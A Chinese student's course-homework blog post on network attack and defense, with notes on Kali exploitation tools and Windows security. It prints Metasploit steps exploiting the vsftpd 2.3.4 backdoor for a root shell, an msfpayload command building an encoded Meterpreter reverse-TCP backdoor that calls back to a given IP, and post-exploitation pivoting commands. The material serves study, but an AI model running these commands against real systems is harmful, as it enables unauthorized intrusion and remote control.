正文 

当前位置: 首页 > 程序 > java教程

2017-2018-220179207《网络攻防技术》第七周作业(代码片段)

konghui0708 konghui0708     2022-11-05     220

关键词:

kali视频(26-31)(漏洞利用)

漏洞利用之检索与利用

漏洞利用工具集

  • 1.searchsploit
Exploit Database->searchsploit

  • 2.pattern create测试漏洞

    armitage结合MSF进行利用

  • 3.jboss-autopwn-linux/win
    专门针对Jboss的漏洞利用工具

  • 4.ikat
    自动化开启,等待目标访问中招。

  • 5.termineter
    评估智能电表的安全性。

漏洞利用之metasploit基础

1.启动服务:

在kali中使用metasploit,需要先使用命令

service postgresql start

开启PostgreSQL数据库服务,使用命令

msfconsole

2.开启metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。

3.首先用nmap -sV扫描目标主机和端口上运行的软件的版本。结果显示目标主机运行着ftp服务器,且版本为vsftpd 2.3.4(此版本的vsftpd存在着漏洞,攻击者可以远程获取目标主机的root权限)。

4.输入use exploit/unix/ftp/vsftpd_234_backdoor,提示符提示进入到该路径下,show options查看需要设置的相关项。提示需要设置RHOST和RPORT(端口默认为21)

5.接下来选择payload,输入命令set payload,按Tab键自动补齐攻击载荷cmd/unix/interact,show options查看需要设置的相关项,设置结束后输入exploit即可实施攻击。

  1. 结果返回目标主机的shell,获取了目标主机的root权限,可以输入命令查看id、网络配置等,攻击也就可以顺利实施。

漏洞利用之Meterpreter介绍

1.生成Meterpreter后门;打开MSF,开启监听(选择exploit/multi/handler);在目标机器上执行door.exe;

2.msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

3.查看自己的IP地址,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)

4.用use exploit/multi/handler来接收返回的连接
设置reverse_tcp的LHOST、LPORT参数

漏洞利用之Metasploit后渗透测试

  • 1.查看跳板机的网卡
ifconfig
  • 2.添加路由表
run autoroute -s 10.0.0.1
  • 3.开socks代理
background 把session置于后台
search socks  使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit
  • 4.通过background和sessions -i可以自由切换进入session
  • 5.输入run可以看到在meterpreter上可以做的很多命令
  • 6.通过run post/可以看到后渗透测试的模块
  • 7.扫描内网信息
run arp_scanner -r 目标IP地址

内网端口转发

upload lcx.exe c:\\ 上传到C盘根目录

漏洞利用之beEf

1、在命令行下启动

BeeFbeef-xss

2、用户名和密码都是beef

3、输入测试网站,可以看到在线机器

4、对网站进行攻击

5、Proxy功能(代理功能)
选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容

6、BeEF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置.
配置

首先打开beef xss目录
cd /usr/share/beef-xss/
ls
nano config.yaml

编辑一下,可以看到有很多配置信息,包括用户名、密码都可以在这设置,在此将Metasploit的false修改为true

漏洞利用之set

第七章 Windows操作系统安全防护

Windows操作系统的发展与现状

Windows在桌面操作系统中占有非常高的市场份额,Windows XP系统在国内仍有大量的用户

Windows操作系统基本结构
1、Windows操作系统内核基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。

2、Windows操作系统在用户态的代码模块:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。

3、核心机制:Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。
Windows系统的网络结构,从OSI网络参考模型的物理层到应用层,各层对应的Windows网络组件模块包括:

①网卡硬件设备驱动程序,位于OSI物理层

②NDIS库及miniport驱动程序,位于OSI链路层

③TDI传输层,也被称为网络协议驱动,位于OSI网络层与传输层

④网络API DLL 及TDI客户端,对应OSI会话层与表示层

⑥网络应用程序与服务进程,对应OSI应用层

**Windows操作系统的安全体系结构与机制 **

1、Windows安全体系结构

基于引用监控器(Reference Monitor)模型来实现基本的对象安全模型。最核心的是位于内核中的SRM(Security Reference Monitor)安全引用监控器,以及位于用户态的LSASS安全服务。

2、Windows身份认证机制

分为用户,用户组,和计算机三大类。对于每个安全主体,以时间和空间上都全局唯一的SID安全标识符来进行标识。

Windows用户密码经过加密处理后被保存于SAM或者活动目录AD中,其中本地用户账户口令信息经过不可逆的128位随机秘钥Hash加密后存储在SAM文件中。

Windows进程、GINA图形化登录窗口,与LSASS服务通过协作来完成本地身份认证过程。

3、Windows授权与访问控制机制

Windows授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。

Windows对于系统中所有需要保护的资源都抽象成对象,而对每个对象会关联一个SD安全描述符(Security Descriptor)都会关联一个对象描述符,有以下属性组成:Owner SID、Group SID、DACL 自主访问控制列表、SACL 系统审计访问控制列表。

4、Windows安全审计机制

系统审计策略在本地安全策略中由系统管理员定义,来确定系统对哪些事件进行记录。

5、Windows的其他安全机制

Windows安全中心中集成了对于保护Windows系统安全稳定运行最为关键的三项安全措施:防火墙,补丁自动更新,以及病毒防护。除了安全中心外,Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等。

6、Windows远程安全攻防技术

Windows远程攻击技术可分为:远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户

7、Windows安全漏洞发现、利用与修补过程

安全漏洞公开披露信息库:几个知名的通用漏洞信息库:CVE、NVD、SecurityFocus、OSVDB等。

8、针对特定目标的渗透测试攻击过程:

①漏洞扫描测试

②查找针对发现漏洞的渗透代码

③实施渗透测试

9、使用Metasploit软件实施渗透测试

Metasploit是完全开源的渗透测试软件。采用开发框架和模块组件的可扩展模型,以Ruby语言编写的Metasploit

Framework(MSF)库作为整个软件的基础核心,为渗透测试组件的开发与测试提供平台;模块组件是真正实施渗透攻击的代码。

Metasploit提供了CLI、Console、Web和GUI四种不同的用户交互接口,其中Console终端是比较常用的方式。

10、Windows远程口令猜测与破解攻击

  • 远程口令自猜测
  • 远程口令字交换通信窃听与破解
  • 远程口令猜测与破解防范措施

11、Windows网络服务远程渗透攻击

Windows操作系统默认开放135(TCP),137(UDP),139(TCP)与445(TCP)端口,对应的网络服务为MSRPC与过程调用服务,NetBIOS网络基本输入输出系统服务和SMB文件与打印机共享服务。

  • 针对NetBIOS网络服务的著名漏洞及攻击
  • 针对SMB网络服务的著名漏洞及攻击
  • 针对MSRPC网络服务的著名漏洞及攻击
  • 针对Windows系统上微软网络服务的远程渗透攻击
  • 针对Windows系统上第三方网络服务的远程渗透攻击

12、网络服务远程渗透攻击防范措施

  • Windows本地安全攻防技术
  • Windows本地特权提升
  • 终极特权:Administrator或者Local System账户。从受限用户权限尝试获得特权账户的攻击技术也被称为特权提升。

13、Windows敏感信息窃取

  • Windows系统口令字密文提取技术
  • Windows系统口令字破解技术
  • 用户敏感数据窃取
  • 本地敏感信息窃取防范措施

14、Windows消踪灭迹

  • 关闭审计功能
  • 清理事件日志
  • 针对消踪灭迹的防范措施

15、Windows远程控制与后门程序

  • 命令行远程控制工具
  • 图形化远程控制工具
  • 针对后门程序防范措施

2017-2018-220179207《网络攻防技术》第十周作业(代码片段)

缓冲区溢出攻防研究Linux缓冲区溢出原理缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器... 查看详情

2017-2018-220179207《网络攻防技术》第五周作业(代码片段)

kali漏洞分析之数据库评估(一)(二)web层与数据库连接的漏洞在安全测试中并不少见,owasp曾经的top之首sql注入漏洞。数据库评估软件1.bbqsql是一个pyth编写的盲注工具,当检测可疑的注入漏洞时会很有用。同时bbqsql是一个半自... 查看详情

网络攻防常见的网络攻防技术——黑客攻防(通俗易懂版)(代码片段)

每个人都能看懂的网络攻防前言一、SQL注入二、XSS攻击1.反射型2.存储型三、CSRF攻击四、DDoS攻击五、DNS劫持六、JSON劫持七、暴力破解总结提示:文章同样适用于非专业的朋友们,全文通俗化表达,一定能找到你亲身... 查看详情

网络攻防实验三

查看详情

网络攻防_实验四

  查看详情

网络攻防实验一

一、安装windowsdir列文件名 二、Linux操作系统命令  查看详情

网络攻防_实验八

       查看详情

网络攻防_实验五

         查看详情

第四周网络攻防实践作业

第四周《网络攻防实践作业》 第一节。网络攻防技术与实践1. 网络嗅探l 定义:网络嗅探是利用计算机的网络端口解惑目的地为其他的计算机的数据报文,以监听数据流中所包含的信息。 l 攻击方式:攻击者... 查看详情

网络攻防_实验六

               查看详情

2017-2018-220179302《网络攻防》第九周作业

教材学习总结本周主要学习了《网络攻防---技术与实践》第9、10章的内容,主要学习了恶意代码攻防与软件安全攻防恶意代码安全攻防1.基础知识恶意代码是指使计算机按照攻击者的意图执行以达到恶意目标的指令集。类型包括... 查看详情

201993012019-2020-2《网络攻防实践》综合实践

201993012019-2020-2《网络攻防实践》综合实践论文信息ImprovedGroupOff-the-RecordMessaging(基于OTR协议的安全传输方法)HongLiuDepartmentofComputingandInformationSciencesKansasStateUniversityhongl@ksu.eduEugeneY.VassermanDepartmentof 查看详情

虚拟化网络攻防实践报告

虚拟化网络攻防实践实验 1.虚拟化网络攻防实践实验组成:l 靶机:包含应用系统和应用程序安全漏洞,髌骨走位攻击目标的主机。l 攻击机:安装一些专用的攻击软件,用于发起网络攻击的主机。l 攻击检测、分... 查看详情

202129032021-2022-2《网络攻防实践》实践7报告

202129032021-2022-2《网络攻防实践》实践7报告1.实践内容Linux系统远程攻防技术Linux远程口令猜测技术利用Linux系统上的finger、rusers和sendmail之类的服务列举出目标系统上的用户账户名,即可猜测相关口令Linux系统上的HTTP/HTTP 查看详情

2017-2018-220179306《网络攻防技术》

网络攻防环境的搭建与测试windows攻击机(VM_WinXPattacker)ip:linux攻击机(SEEDUbuntu9_August_2010)ip:windows靶机(VM_Metasploitable_xpsp1)ip:linux靶机(VM_Metasploitable_ubuntu)ip:winpingwin:winpinglinux:linuxpingwin:linuxpingli 查看详情

网络攻防实验三

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验三密码破解技术   学生姓名房斌年级2014级 区队 五区指导教师 高见  信息技术与网络安全学院2016年11月24日 查看详情

网络攻防作业

中国人民公安大学(PPSUC)网络对抗技术作业姓名:祝越野学号:201421460018指导教师:高见        实验日期:2017年9月10日 1、虚拟机安装与调试安装windows和linux(kali)两个虚拟机,均采用NAT网络... 查看详情

201991302019-2020-2《网络攻防实践》综合大实践

201991302019-2020-2《网络攻防实践》综合大实践kAFL:Hardware-AssistedFeedbackFuzzingforOSKernels一、论文信息1.1论文相关信息作者:SergejSchumilo,CorneliusAschermann,andRobertGawlik,Ruhr-Universit?tBochum;SebastianSchinzel,MünsterUn 查看详情